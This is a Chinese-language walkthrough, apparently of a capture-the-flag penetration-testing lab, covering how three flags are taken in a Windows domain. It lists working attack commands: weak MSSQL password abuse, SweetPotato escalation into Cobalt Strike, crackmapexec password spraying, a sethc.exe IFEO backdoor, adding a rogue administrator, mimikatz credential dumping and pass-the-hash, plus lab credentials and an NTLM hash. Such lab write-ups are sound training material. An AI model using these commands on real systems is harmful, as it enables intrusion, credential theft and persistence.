Flag 01
1、使用fscan进行扫描。 (33.99.251.254)
发现mssql弱口令漏洞,使用工具连接。
2、连接数据库使用工具完成命令执行
工具:Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar
3、当前权限为mssqlserver权限,需要提权。(此处使用得是甜土豆进行提权上线CS)
4、上线CS
(1)mssqlserver权限
c:\users\\public\artifact_x64.exe
(2)system权限
mssqlserver权限下输入
shell c:\users\public\sweetpotato.exe -a "c:\users\public\artifact_x64.exe"
5、在system权限下获取第一个flag。
Flag 02
1、进程注入上线jhon用户。
上线jhon用户。
jhon用户信息收集发现他的共享文件。
shell net use
shell type \\tsclient\c\credential.txt
发现疑似密码信息。
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#
2、搭建代理使用kali做密码喷洒
配代理。
密码喷洒
proxychains4 -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
密码过期了,使用kali直接连接远程桌面修改密码。
proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#'
改密码完成登录。
3、先提权后获取flag 02
(1)提权
kali里太卡了,转用SocksCap64-4.7配代理远程连接。
连接成功
通过镜像劫持进行提权
powershell种输入下列操作。
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
设置镜像劫持shift后门
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
然后锁定桌面,锁屏状态按5次shift
获取flag 02
Flag 03
1、cmd中添加本地用户
net user sahx Ald@rLMWuy7Z!# /add
net localgroup administrators sahx /add
2、连接刚刚创建的sahx账号
通过复制粘贴的形式将mimikatz从本地上传到远程,并以管理员身份运行。
3、minikatz提升权限
privilege::debug #提升权限
token::elevate 将权限提升至system
导出用户hash
sekurlsa::logonpasswords
获取后进行hash传递。(输入后会弹出cmd窗口)
sekurlsa::pth /user:WIN2016$ /domain:XIAORANG /ntlm:adcd60560397bbaf2cd059dfe4676f77
在 cmd窗口中输入查找flag 03 (若提示密码不正确则返回上一步查看hash值是否传递正确)
dir \\172.22.8.15\c$\Users\Administrator\flag
type \\172.22.8.15\c$\Users\Administrator\flag\flag03.txt
结束